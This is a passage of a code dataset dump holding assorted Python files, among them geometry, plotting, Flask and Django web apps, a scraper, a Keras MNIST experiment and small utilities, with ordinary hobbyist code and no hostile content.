glEnd()","sub_path":"pycfiles/dicom_tools-2.5-py3.7/GLGridItem.cpython-37.py","file_name":"GLGridItem.cpython-37.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"357831646","text":"from packages.turf_invariant import get_coord\n\n# http://en.wikipedia.org/wiki/Even%E2%80%93odd_rule\n# modified from: https://github.com/substack/point-in-polygon/blob/master/index.js\n# which was modified from http://www.ecse.rpi.edu/Homepages/wrf/Research/Short_Notes/pnpoly.html\n\n# Takes a {@link Point} and a {@link Polygon} or {@link MultiPolygon}\n# and determines if the point resides inside the polygon. The polygon can\n# be convex or concave. 
The function accounts for holes.\n#\n# @name inside\n# @param {Feature<Point>} point input point\n# @param {Feature<(Polygon|MultiPolygon)>} polygon input polygon\n# or multipolygon\n# @return {Boolean} `true` if the Point is inside the Polygon; `false` if\n# the Point is not inside the Polygon\n# @example\n# var pt = point([-77, 44]);\n# var poly = polygon([[\n#   [-81, 41],\n#   [-81, 47],\n#   [-72, 47],\n#   [-72, 41],\n#   [-81, 41]\n# ]]);\n#\n# var isInside = turf.inside(pt, poly);\n#\n# //=isInside\n#\ndef inside(point, polygon):\n    pt = get_coord(point)\n    polys = polygon[\"geometry\"][\"coordinates\"]\n    # normalize to multipolygon\n    if polygon[\"geometry\"][\"type\"] == 'Polygon':\n        polys = [polys]\n\n    inside_poly = False\n    for i in range(len(polys)):\n        if inside_poly:\n            break\n        # check if it is in the outer ring first\n        if in_ring(pt, polys[i][0]):\n            in_hole = False\n            k = 1\n            # check for the point in any of the holes\n            while k < len(polys[i]) and not in_hole:\n                if in_ring(pt, polys[i][k]):\n                    in_hole = True\n                k += 1\n            if not in_hole:\n                inside_poly = True\n    return inside_poly\n\n\n# pt is [x,y] and ring is [[x,y], [x,y],..]\ndef in_ring(pt, ring):\n    is_inside = False\n    j = len(ring) - 1\n    for i in range(len(ring)):\n        xi, yi = ring[i][0], ring[i][1]\n        xj, yj = ring[j][0], ring[j][1]\n        intersect = ((yi > pt[1]) != (yj > pt[1])) and \\\n            (pt[0] < (xj - xi) * (pt[1] - yi) / (yj - yi) + xi)\n        if intersect:\n            is_inside = not is_inside\n        j = i  # j trails i by one vertex (port of the JS idiom j = i++)\n\n    return is_inside\n","sub_path":"packages/turf_inside/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"423905927","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nn_ancilla = 1\nn_post = 0\nshould_save = True\n\ndata_sets = ['sin', 'sinc', 'x_cubed']\n\nplt.rc('text', usetex=True)\nplt.rc('font', family='serif')\n# plt.figure(figsize=(8*3, 5))\n\nfor k in range(3):\n    res_folder = os.path.join(os.curdir, 'results',\n                              '{}-{}-{}'.format(data_sets[k], n_ancilla, n_post))\n\n    if len(os.sys.argv) > 2:\n        should_save = bool(int(os.sys.argv[2]))\n        qualifier = \"Will\" if should_save else \"Won't\"\n        print(qualifier + \" save plot\")\n\n    # Load in network outputs\n    output_file = os.path.join(res_folder, 'output.npz')\n    with np.load(output_file) as f:\n        loss = f['loss']\n\n    # plt.subplot(1, 3, k+1)\n\n    # Plot losses\n    plt.plot(loss)\n\n    plt.xlabel(\"Step\", fontsize=16)\n    if k == 0:\n        plt.ylabel(\"Loss\", fontsize=16)\n\nplt.legend([r'$\\\sin(x)$', r'$\\\mathrm{sinc}(x)$', r'$x^3$'], fontsize=16)\nplt.title(r'$(n_{\\\mathrm{in}}, n_{\\\mathrm{post}}) = ('\n          + str(n_ancilla) + ', ' + str(n_post) + r')$',\n          fontsize=18)\nplt.xlim([0, 2000])\n\nif should_save:\n    save_path = os.path.join('results', \"losses-{}-{}.eps\".format(n_ancilla, n_post))\n    plt.savefig(save_path, bbox_inches='tight')\n    print(\"Saved plot to: \" + save_path)\n\nplt.show()\n","sub_path":"curve_fit/plot_all_losses.py","file_name":"plot_all_losses.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"60405606","text":"from distutils.core import setup\ntry:\n    from setuptools import find_packages\n    packages = find_packages()\nexcept ImportError:\n    import os\n    packages = [x.strip('./').replace('/','.') for x in os.popen('find -name \"__init__.py\" | xargs -n1 dirname').read().strip().split('\\n')]\n\nsetup(\n    name='cfg-explorer',\n    version='0.0.1',\n    author='Attila Axt',\n    
author_email='axt@load.hu',\n license='BSD',\n platforms=['Linux'],\n packages=packages,\n install_requires=[\n 'argparse',\n 'angr',\n 'bingraphvis'\n ],\n description='CFG explorer',\n long_description='CFG explorer',\n url='https://github.com/axt/cfg-explorer',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"266934740","text":"from flask import Flask, render_template, url_for, request, redirect, flash\n# import pyrebase\nimport os\nfrom avatar import crop\nfrom speed import toPercentValue, toSpeedValue\nimport requests\nimport json\n\napp = Flask(\n __name__,\n template_folder='templates',\n static_folder='static'\n)\n\n# config = {\n# 'apiKey': \"AIzaSyA3ZYaV-3uJmusX3-nfV71CT5pbjyLqbtY\",\n# 'authDomain': \"teleprompterandroidjava.firebaseapp.com\",\n# 'databaseURL': \"https://teleprompterandroidjava-default-rtdb.europe-west1.firebasedatabase.app\",\n# 'projectId': \"teleprompterandroidjava\",\n# 'storageBucket': \"teleprompterandroidjava.appspot.com\",\n# 'messagingSenderId': \"300471537841\",\n# 'appId': \"1:300471537841:web:de99d6f9e4316faeddd290\",\n# 'measurementId': \"G-Y3RVRFQ01W\"\n# }\n\n# app.config['SECRET_KEY'] = config['apiKey']\n\n# firebase = pyrebase.initialize_app(config)\n# auth = firebase.auth()\n# db = firebase.database()\n# storage = firebase.storage()\n\n\nuserId = ''\ncurrent_user = dict()\n\nuserIdsDict = {}\n\n\ndef sign_out():\n # Удаляем предыдущий аватар, если он еще сохранен\n try:\n os.remove('static/images/avatar.jpeg')\n except:\n print('Can\\'t remove avatar')\n global userId\n global current_user\n userId = ''\n current_user = dict()\n\n\nsign_out()\n\n\n@app.route('/home')\ndef home():\n return redirect('/')\n\n\n@app.route('/exception')\ndef exception():\n return render_template('exception.html')\n\n\n@app.route('/to-speed-value')\ndef tospeedvalue():\n speedGot = int(request.args['speedGot'])\n return str(toSpeedValue(speedGot))\n\n\n@app.route('/to-percent-value')\ndef topercentvalue():\n speedGot = int(request.args['speedGot'])\n return str(toPercentValue(speedGot))\n\n\n@app.route('/save-user-id', methods=['POST', 'GET'])\ndef saveuserid():\n global userIdsDict\n if request.method == 'POST':\n user_id_got = request.form['userid']\n userIdsDict[request.remote_addr] = user_id_got\n print(userIdsDict)\n return redirect('/')\n\n\n@app.route('/get-user-id')\ndef getuserid():\n global userIdsDict\n user_id = '-1'\n try:\n user_id = userIdsDict[request.remote_addr]\n print(user_id)\n except Exception as e:\n print(e)\n return user_id\n\n\n@app.route('/auth')\ndef auth():\n return render_template('index-guest.html')\n\n\n@app.route('/sign-out')\ndef signout():\n try:\n userIdsDict[request.remote_addr] = '-1'\n except:\n print('Exception')\n return redirect('/')\n\n\n@app.route('/for-html-tests')\ndef forhtmltests():\n return render_template('index-guest.html')\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n# def index():\n# name = ''\n# global current_user\n# global userId\n# if current_user != dict():\n# userId = current_user['localId']\n# print('Signed in')\n# if userId != '':\n# # print('Trying to get name...')\n# # name = db.child(\"users\").child(userId).child('name').get().val()\n# if os.path.exists('static/images/avatar.jpeg'):\n# return render_template('index.html', name=name, downloaded=True, user_id=userId)\n# else:\n# return render_template('index.html', name=name, 
downloaded=False, user_id=userId)\n# else:\n# return render_template('index-guest.html')\n\n\n@app.route('/about')\ndef about():\n return 'About page'\n\n\n# @app.route('/files-list')\n# def filesList():\n# if current_user != dict() and userId != '':\n# return render_template('test.html', user_id=userId)\n# else:\n# return redirect('/')\n\n\n# @app.route('/create', methods=[\"GET\", \"POST\"])\n# def create():\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# editor = request.form['editor']\n# if request.form['title'] != '':\n# fileName = request.form['title'] + '.html'\n# else:\n# return render_template('edit.html', content=editor, title=\"\", notitle=True)\n# file = open('static/files/' + fileName, 'w')\n# file.write(editor)\n# file.close()\n# fullFileName = userId + '/files/' + fileName\n# storage.child(fullFileName).put('static/files/' + fileName)\n# os.remove('static/files/' + fileName)\n# flash('Изменения сохранены!')\n# return render_template('edit.html', content=editor, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# # Для тестов: zVElAdFPEiUd3FwL2Y08snmk2wZ2/TestForServer.html\n# return render_template('edit.html', content=\"\", title=\"\", notitle=True)\n# else:\n# return redirect('/')\n\n\n@app.route('/edit//', methods=['POST', 'GET'])\ndef edit(localId, fileName):\n return render_template('download.html', localId=localId, fileName=fileName)\n\n\n# def edit(localId, fileName):\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# editor = request.form['editor']\n# fileName = request.form['title'] + '.html'\n# file = open('static/files/' + fileName, 'w')\n# file.write(editor)\n# file.close()\n# fullFileName = localId + '/files/' + fileName\n# storage.child(fullFileName).put('static/files/' + fileName)\n# os.remove('static/files/' + fileName)\n# flash('Изменения сохранены!')\n# return render_template('edit.html', content=editor, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# if localId == userId:\n# # Если id пользователя (который вошел на сайт под своим логином и паролем) совпадает с id пользователя, загрузившего документ (то есть, пользователь хочет просмотреть свой документ, а не чужой), то все нормально, можно открывать страницу редактирования\n# # Для тестов: zVElAdFPEiUd3FwL2Y08snmk2wZ2/TestForServer.html\n# print('We are ready to download a file!')\n# print(localId)\n# print(fileName)\n# fullFileName = localId + '/files/' + fileName\n# storage.child(fullFileName).download('static/files/' + fileName)\n# file = open('static/files/' + fileName)\n# content = file.read()\n# file.close()\n# os.remove('static/files/' + fileName)\n# return render_template('edit.html', content=content, title=fileName[:fileName.rfind('.')], notitle=False)\n# else:\n# return render_template('exception.html')\n# else:\n# return redirect('/')\n@app.route('/create')\n@app.route('/get-file-content', methods=['POST', 'GET'])\ndef getfilecontent():\n # data = request.data\n # dataDict = json.loads(data)\n # url = dataDict['url']\n if request.method == 'POST':\n url = request.form['url']\n title = request.form['title']\n send_request = requests.get(url)\n return render_template('edit.html', content=send_request.content.decode('utf-8'),\n title=title[:title.rfind('.')])\n else:\n return render_template('edit.html', content='', title='Rename me!')\n\n\n@app.route('/settings', methods=['POST', 'GET'])\ndef settings():\n return render_template('settings.html')\n\n\n# def settings():\n# if current_user != dict() and 
userId != '':\n# if request.method == 'POST':\n# # Сохранение настроек\n# textColor = request.form['textColor']\n# textSize = request.form['textSize']\n# bgColor = request.form['bgColor']\n# speed = request.form['speed']\n# speed = str(toSpeedValue(int(speed)))\n\n# try:\n# dbPath = 'users/' + userId + '/settings/'\n# settingsDict = {\n# \"textColor\": str(textColor),\n# \"textSize\": str(textSize),\n# \"bgColor\": str(bgColor),\n# \"speed\": speed\n# }\n# db.child(dbPath).set(settingsDict)\n\n# flash('Изменения сохранены!')\n# return redirect('/settings')\n# except:\n# return render_template('exception.html') \n# else:\n# # Получение настроек\n# textColor = '0'\n# textSize = '16'\n# bgColor = '1'\n# speed = '1'\n\n# dbPath = 'users/' + userId + '/settings/'\n# textSize = db.child(dbPath + 'textSize').get(current_user['idToken']).val()\n# textColor = db.child(dbPath + 'textColor').get(current_user['idToken']).val()\n# speed = db.child(dbPath + 'speed').get(current_user['idToken']).val()\n# bgColor = db.child(dbPath + 'bgColor').get(current_user['idToken']).val()\n\n# speed = str(toPercentValue(int(speed)))\n\n# return render_template('settings.html', bgColor=bgColor, textColor=textColor, textSize=textSize, speed=speed, user_id=userId)\n# else:\n# return redirect('/')\n\n# @app.route('/login', methods=['POST', 'GET'])\n# def login():\n# global current_user\n# global userId\n# if current_user == dict() or userId == '':\n# if request.method == 'POST':\n# email = request.form['email']\n# password = request.form['password']\n# print(email, password)\n# try:\n# current_user = auth.sign_in_with_email_and_password(email, password)\n# userId = current_user['localId']\n# # downloadAvatar(storage, current_user)\n# return redirect('/')\n# except:\n# return render_template('exception.html')\n# else:\n# return render_template('login.html')\n# else:\n# sign_out()\n# return redirect('/login')\n\n\n# @app.route('/signup', methods=['POST', 'GET'])\n# def signup():\n# global current_user\n# global userId\n# if current_user == dict() or userId == '':\n# if request.method == 'POST':\n# email = request.form['email']\n# password = request.form['password']\n# name = request.form['name']\n# print(email, password, name)\n# try:\n# current_user = auth.create_user_with_email_and_password(email, password)\n# userId = current_user['localId']\n# print(userId)\n\n# # Сохраняем имя\n# db.child('users/'+userId+'/name').set(name)\n# db.child('users/'+userId+'/email').set(email)\n# return redirect('/')\n# except:\n# return render_template('exception.html')\n# else:\n# return render_template('signup.html')\n# else:\n# sign_out()\n# return redirect('/signup')\n\n\n# @app.route('/save-avatar', methods=['POST'])\n# def saveavatar():\n# avatarFile = request.files['avatarFile']\n# avatarFile.save('static/images/avatar.jpeg')\n# crop()\n# # uploadAvatar(storage, current_user)\n# return redirect('/')\n\n\n@app.route('/get-cropped-avatar', methods=['POST'])\ndef getcroppedavatar():\n avatarFile = request.files['avatarFile']\n avatarFile.save('static/images/avatar.jpeg')\n crop()\n with open('static/images/avatar.jpeg', 'rb') as image:\n f = image.read()\n b = bytearray(f)\n os.remove('static/images/avatar.jpeg')\n return b\n\n\n@app.route('/profile', methods=['POST', 'GET'])\n# def profile():\n# if current_user != dict() and userId != '':\n# if request.method == 'POST':\n# # Сохранение имени\n# name = request.form['name']\n# try:\n# dbPath = 'users/' + userId + '/name'\n# db.child(dbPath).set(name)\n# flash('Изменения сохранены!')\n# 
return redirect('/profile')\n#             except:\n#                 return render_template('exception.html') \n#         else:\n#             # Retrieve the settings\n#             dbPath = 'users/' + userId + '/name'\n#             name = db.child(dbPath).get().val()\n#             if os.path.exists('static/images/avatar.jpeg'):\n#                 return render_template('profile.html', name=name, downloaded=True)\n#             else:\n#                 return render_template('profile.html', name=name, downloaded=False)\n#     else:\n#         return redirect('/')\ndef profile():\n    return render_template('profile.html')\n\n\nif __name__ == \"__main__\":\n    app.run(\n        host='0.0.0.0',\n        port=8080,\n        debug=True\n    )\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":12075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46289011","text":"import pygame\n\npygame.init()\n\n# Set the screen size\nscreen_width = 480\nscreen_height = 640 # vertical size\nscreen = pygame.display.set_mode((screen_width, screen_height))\n\n# Set the window title\npygame.display.set_caption(\"abc\")\n\n# Load the background image\nbackground = pygame.image.load(\"C:\\\\Users\\\\mussy\\\\OneDrive\\\\바탕 화면\\\\PythonStudy\\\\pygame_basic\\\\background.png\")\n\n# Event loop\nrunning = True\nwhile running:\n    for event in pygame.event.get(): # did an event occur?\n        if event.type == pygame.QUIT: # the window was closed\n            running = False\n\n    screen.blit(background, (0, 0)) # draw the background at position (x, y)\n\n    pygame.display.update() # redraw the game screen\n\n# Quit pygame\npygame.quit()\n","sub_path":"pygame_basic/2_background.py","file_name":"2_background.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"396053957","text":"\"\"\"\nVarious routines that are too slow to run in real time are tabulated here.\n\nEspecially of note are Lena's ssWLC parameters code, which nobody has access to\nanymore to the best of my knowledge (except Andy, who doesn't know how to use\nit) and Tom's Rouse velocity cross-correlation code, which required an entire\nrotation student to even run back when it did exist. 
I think it's saved under\nsome folder called ParConV4, but I haven't put in the time to try to figure out\nif it's usable.\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport scipy\n\nfrom pathlib import Path\n\n# precomputed velocity cross-correlation for Rouse polymer\n# from Lampo et al, was pre-computed on a grid...\ndeltas_ = np.linspace(-3, 3, 25) # for corresponding values in logspace\nalphas_ = np.linspace(0.25, 1, 31) # steps of 0.025\ntOverDeltas_ = np.linspace(0, 5, 501) # steps of 0.01\nvvcf_table_ = np.reshape(np.loadtxt(\n    Path(__file__).parent / Path('vvcf_table.csv'), delimiter=','\n    ), (31, 25, 501))\n\n\ndef calc_vel_corr_fixed_(tOverDelta, deltaOverTDeltaN, alpha):\n    \"\"\"Perform interpolation in logspace for \"delta\"/deltaOverTDeltaN.\"\"\"\n    deltaOverTDeltaN = np.log10(deltaOverTDeltaN)\n    return scipy.interpolate.interpn((alphas_, deltas_, tOverDeltas_),\n                                     vvcf_table_,\n                                     (alpha, deltaOverTDeltaN, tOverDelta))\n\n\ncalc_vel_corr_fixed_.vvcf = None\nfrac_vel_corr = np.vectorize(calc_vel_corr_fixed_)\n\ndsswlc_params = pd.read_csv(Path(__file__).parent / Path('dssWLCparams'),\n                            sep=' ', header=None)\ndsswlc_params.columns = ['DEL', 'EB', 'GAM', 'EPAR', 'EPERP', 'ETA', 'XIU',\n                         'UNKNOWN']\n\n\ndef dsswlc_from_del(delta):\n    \"\"\"\n    Get dsswlc sim params by interpolating Lena's tabulated values.\n\n    Parameters\n    ----------\n    DEL : float\n        Number of persistence lengths between each pair of beads.\n\n    Returns\n    -------\n    ('EB', 'GAM', 'EPAR', 'EPERP', 'ETA', 'XIU', 'UNKNOWN')\n        Parameters of the dsswlc for simulation.\n    \"\"\"\n    return [np.interp(delta, dsswlc_params['DEL'], dsswlc_params[col])\n            for col in dsswlc_params.columns[1:]]\n","sub_path":"wlcsim/tabulation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"275405800","text":"from django.urls import include, path\nfrom rest_framework import routers\nfrom scheduling.views import EmployeeViewSet, AppointmentViewSet, CompanyViewSet\n\nrouter = routers.DefaultRouter()\nrouter.register(r'employees', EmployeeViewSet, base_name='employee')\nrouter.register(r'appointments', AppointmentViewSet, base_name='appointment')\nrouter.register(r'companies', CompanyViewSet, base_name='company')\n\nurlpatterns = [\n    path(r'', include(router.urls)),\n    path(r'admin/', include('scheduling.api_admin.urls')),\n    path(r'', include('rest_framework.urls', namespace='rest_framework'))\n]\n","sub_path":"scheduling/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"215216984","text":"import os\nimport os.path\nimport shutil\nimport time, datetime\n\n\n\n# Copy the files under sourceDir into targetDir\ndef copyFiles(sourceDir, targetDir):\n    if sourceDir.find(\".svn\") > 0:\n        return\n    for file in os.listdir(sourceDir):\n        sourceFile = os.path.join(sourceDir, file)\n        targetFile = os.path.join(targetDir, file)\n        if os.path.isfile(sourceFile):\n            if not os.path.exists(targetDir):\n                os.makedirs(targetDir)\n            if not os.path.exists(targetFile) or (os.path.exists(targetFile) and (os.path.getsize(targetFile) != os.path.getsize(sourceFile))):\n                open(targetFile, \"wb\").write(open(sourceFile, \"rb\").read())\n        if os.path.isdir(sourceFile):\n            First_Directory = False\n            copyFiles(sourceFile, targetFile)\n\n# Copy all files from one folder into another directory, overwriting existing ones\ndef coverFiles(sourceDir, targetDir):\n    for file in os.listdir(sourceDir):\n        sourceFile = os.path.join(sourceDir, file)\n        targetFile = os.path.join(targetDir, file)\n        # cover the files\n        if os.path.isfile(sourceFile):\n            open(targetFile, \"wb\").write(open(sourceFile, \"rb\").read())\n\n\n\n\nif __name__ == \"__main__\":\n    # image2num is the number of photos in the image folder under test2\n    image1path = \"D:\\\\py_buffer\\\\docx_Pro\\\\test1\\\\word\\\\media\\\\\"\n    image2path = \"D:\\\\py_buffer\\\\docx_Pro\\\\test2\\\\word\\\\media\\\\\"\n    image1num = (sum([len(x) for _, _, x in os.walk(os.path.dirname(image1path))]))\n    image2num = (sum([len(x) for _, _, x in os.walk(os.path.dirname(image2path))]))\n    # create an empty media folder under test3\\word\n    os.mkdir(\"D:\\\\py_buffer\\\\docx_Pro\\\\test3\\\\word\\\\media\")\n    image3path = \"D:\\\\py_buffer\\\\docx_Pro\\\\test3\\\\word\\\\media\\\\\"\n\n    for i in range(image2num):\n        os.rename(image2path + 'image' + str(i + 1) + '.png', image2path + 'image' + str(i + image2num + 1) + '.png')\n\n    for i in range(image2num):\n        os.rename(image2path + 'image' + str(i + image2num + 1) + '.png', image2path + 'image' + str(i + 2) + '.png')\n\n\n    coverFiles(image1path, image3path)\n    coverFiles(image2path, image3path)\n\n\n\n\n\n","sub_path":"rename_copy_image.py","file_name":"rename_copy_image.py","file_ext":"py","file_size_in_byte":2134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"644207794","text":"import requests\nimport string\nfrom bs4 import BeautifulSoup\n\nurl = 'https://www.nature.com/nature/articles'\nr = requests.get(url, headers={'Accept-Language': 'en-US,en;q=0.5'})\n# print(r.status_code)\n\nsoup = BeautifulSoup(r.content, 'html.parser')\n\n# get area where all items will come from\narea = soup.find_all('article')\nprint(len(area))\nprint(area[0])\n\nnews = []\n# first get article type\nfor i in area:\n    article_type = i.find('span', {'class': 'c-meta__type'}).get_text()\n    if article_type == \"News\":\n        # then get follow link\n        href = i.find('a').get('href')\n        news.append(f\"https://www.nature.com{href}\")\n\nfor art in news:\n    req_art = requests.get(art)\n    soup2 = BeautifulSoup(req_art.content, 'html.parser')\n    if req_art.status_code == 200:\n        # get title\n        title = soup2.find('h1', {'class':'c-article-magazine-title'}).get_text()\n        # print(title)\n        # format title\n        final_title = title.strip().translate(title.maketrans('','',string.punctuation)).replace('‘','').replace(\"’\",\n                      \"\").replace(' '\n                      '','_')\n        # print(f'{final_title}.txt')\n\n\n        # get body\n        body = soup2.find('div', {'class':'c-article-body'}).text\n        # print(body)\n\n        # save to file\n        file = open(f'{final_title}.txt', 'w')\n        file.write(body)\n        file.close()","sub_path":"Web Scraper/task/stage4.py","file_name":"stage4.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"576362904","text":"from __future__ import absolute_import\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nfrom keras.datasets import mnist\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.utils import np_utils\nfrom keras.optimizers import SGD\nfrom keras.regularizers import l2, activity_l2\nimport matplotlib\nmatplotlib.use('Agg')\nimport pylab as P\n#import keras.regularizers.WeightRegularizer\nbatch_size = 128\nnb_classes = 10\nnb_epoch = 14\n\nimg_rows, img_cols 
= 28, 28\nnb_filters = 32\nnb_pool = 2\nnb_conv = 3\n\nimageFolder = './Images/'\n\n(X_train, y_train), (X_test, y_test) = mnist.load_data()\n\nX_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\nX_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\nX_train = X_train.astype(\"float32\")\nX_test = X_test.astype(\"float32\")\nX_train /= 255\nX_test /= 255\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nY_train = np_utils.to_categorical(y_train, nb_classes)\nY_test = np_utils.to_categorical(y_test, nb_classes)\n\nmodel = Sequential()\n\nmodel.add(Convolution2D(96, nb_conv, nb_conv,\n input_shape=(1, img_rows, img_cols),init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Convolution2D(256, nb_conv, nb_conv,init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(MaxPooling2D(pool_size=(nb_pool, nb_pool)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128,init='he_normal'))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(nb_classes,init='he_normal'))\nmodel.add(Activation('softmax'))\n\nmodel.compile(loss='categorical_crossentropy', optimizer=SGD(lr=0.05,decay=0.01))\n\n#model.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=nb_epoch, show_accuracy=True, verbose=1, validation_data=(X_test, Y_test))\n\nsizeTraining = np.shape(X_train)[0]\npredictions = np.zeros((sizeTraining,10))\npredictionsArray = list()\nscoreTestBP = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingBP = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\n#PRE-TRAINING STARTING\n# print(\"PRETRAINING STARTING\")\n# for i in range(0,nb_epoch):\n# \tpermutation = np.random.permutation(sizeTraining)\n# \tX_train2 = X_train[permutation]\n# \tpredictionsArray = list()\n# \tfor j in range(0,sizeTraining):\n# \t\tout = np.zeros((1,10))\n# \t\tcurrentImage = X_train2[j].reshape(1,1,28,28)\n# \t\tprediction = model.predict(currentImage, batch_size=1, verbose=0)\n# \t\t#maxPrediction = np.amax(prediction)\n# \t\tpredictionsArray.append(int(prediction))\n# \t\t#print('',maxPrediction)\n# \t\tout[0,prediction] = 1\n# \t\tpredictions[j,:] = out\n# # \t\tmodel.train_on_batch(currentImage,prediction,accuracy=True)\n# \tnameOfNextPlot = imageFolder + 'iteration' + str(i) + '.png'\n# \thistFig = P.figure()\n# \tP.hist(predictionsArray,bins=50)\n# \thistFig.savefig(nameOfNextPlot)\n# \tmodel.fit(X_train2,predictions,batch_size=128,nb_epoch=1,verbose=1, show_accuracy=True,validation_data=(X_test, Y_test))\n\n# \tstringToShow = str(i)\n# \tprint(\"EPOCH \" + stringToShow + \" DONE\")\n\n# print(\"PRETRAINING DONE\")\nscoreTestAP = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingAP = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\n#TRAINING STARTING\nmodel.fit(X_train, Y_train, batch_size=batch_size, nb_epoch=50, show_accuracy=True, verbose=1, validation_data=(X_test, Y_test))\n\nscoreTestAT = model.evaluate(X_test, Y_test, show_accuracy=True, verbose=0)\nscoreTrainingAT = model.evaluate(X_train, Y_train, show_accuracy=True, verbose=0)\n\nprint('TRAINING LOSS BEFORE PRE-TRAINING:', scoreTrainingBP[0])\nprint('TRAINING ACCURACY BEFORE PRE-TRAINING:', scoreTrainingBP[1])\nprint('TEST LOSS BEFORE PRE-TRAINING:', scoreTestBP[0])\nprint('TEST ACCURACY BEFORE PRE-TRAINING:', scoreTestBP[1])\nprint('TRAINING LOSS AFTER PRE-TRAINING:', scoreTrainingAP[0])\nprint('TRAINING 
ACCURACY AFTER PRE-TRAINING:', scoreTrainingAP[1])\nprint('TEST LOSS AFTER PRE-TRAINING:', scoreTestAP[0])\nprint('TEST ACCURACY AFTER PRE-TRAINING:', scoreTestAP[1])\nprint('TRAINING LOSS AFTER TRAINING:', scoreTrainingAT[0])\nprint('TRAINING ACCURACY AFTER TRAINING:', scoreTrainingAT[1])\nprint('TEST LOSS AFTER TRAINING:', scoreTestAT[0])\nprint('TEST ACCURACY AFTER TRAINING:', scoreTestAT[1])","sub_path":"PhD_Experiments/MNIST_WithPretraining.py","file_name":"MNIST_WithPretraining.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"558473229","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom django.apps import AppConfig\nfrom django.core.exceptions import AppRegistryNotReady\n\nfrom InvenTree.ready import canAppAccessDatabase\nimport InvenTree.tasks\n\n\nlogger = logging.getLogger(\"inventree\")\n\n\nclass InvenTreeConfig(AppConfig):\n name = 'InvenTree'\n\n def ready(self):\n\n if canAppAccessDatabase():\n self.start_background_tasks()\n\n def start_background_tasks(self):\n\n try:\n from django_q.models import Schedule\n except (AppRegistryNotReady):\n return\n\n logger.info(\"Starting background tasks...\")\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.delete_successful_tasks',\n schedule_type=Schedule.DAILY,\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.check_for_updates',\n schedule_type=Schedule.DAILY\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.heartbeat',\n schedule_type=Schedule.MINUTES,\n minutes=15\n )\n\n InvenTree.tasks.schedule_task(\n 'InvenTree.tasks.update_exchange_rates',\n schedule_type=Schedule.DAILY,\n )\n","sub_path":"InvenTree/InvenTree/apps.py","file_name":"apps.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"490856297","text":"def par(a):\n for x in a:\n for y in x:\n print(y, end=\" \")\n print()\n print()\n\ndef lcs(x, y):\n m = len(x)\n n = len(y)\n arr = [[0 for i in range(n+1)] for j in range(m+1)]\n\n for i in range(m+1):\n for j in range(n+1):\n if(i == 0 or j == 0):\n arr[i][j] = 0\n elif(x[i-1] == y[j-1]):\n arr[i][j] = 1 + arr[i-1][j-1]\n else:\n arr[i][j] = max(arr[i-1][j], arr[i][j-1])\n par(arr)\n i = len(arr)-1\n j = len(arr[0])-1\n str = \"\"\n while(i > 0 and j > 0):\n if(arr[i][j-1] == arr[i][j]):\n j -= 1\n else:\n str = str+ y[j-1]\n i = i - 1\n j = j - 1\n print(str[::-1])\n\n\n'''\nw1 = input(\"Enter first word: \")\nw2 = input(\"Enter second word: \")\nlcs(w1, w2)\n'''\n\nlcs('stone', 